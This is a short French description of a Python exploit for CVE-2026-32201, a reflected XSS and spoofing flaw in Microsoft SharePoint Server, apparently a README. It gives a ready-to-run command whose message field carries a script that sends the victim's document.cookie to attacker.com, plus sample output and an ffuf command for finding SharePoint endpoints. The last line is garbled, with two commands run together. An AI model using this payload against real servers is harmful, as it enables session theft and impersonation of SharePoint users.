
Exploit Python pour CVE-2026-32201, une XSS réfléchie dans Microsoft SharePoint Server, permettant l'usurpation non authentifiée et la modification de données via des requêtes HTTP conçues.
Exploit Python pour CVE-2026-32201 - validation d'entrée incorrecte dans Microsoft SharePoint Server, permettant l'usurpation réseau non authentifiée (C:L/I:L).
python3 exploit.py https://sharepoint.target.com \
--recipient [email protected] \
--sender "[email protected]" \
--message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
--endpoint /_layouts/15/notify.aspx
Exemple de sortie :
[+] SharePoint détecté.
[*] Envoi de la requête usurpée à https://target.com/_layouts/15/notify.aspx
[+] Statut : 200
[+] Succès potentiel : Vérifiez les journaux/e-mails de la cible pour le contenu usurpé.
ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt--message pour le vol de cookies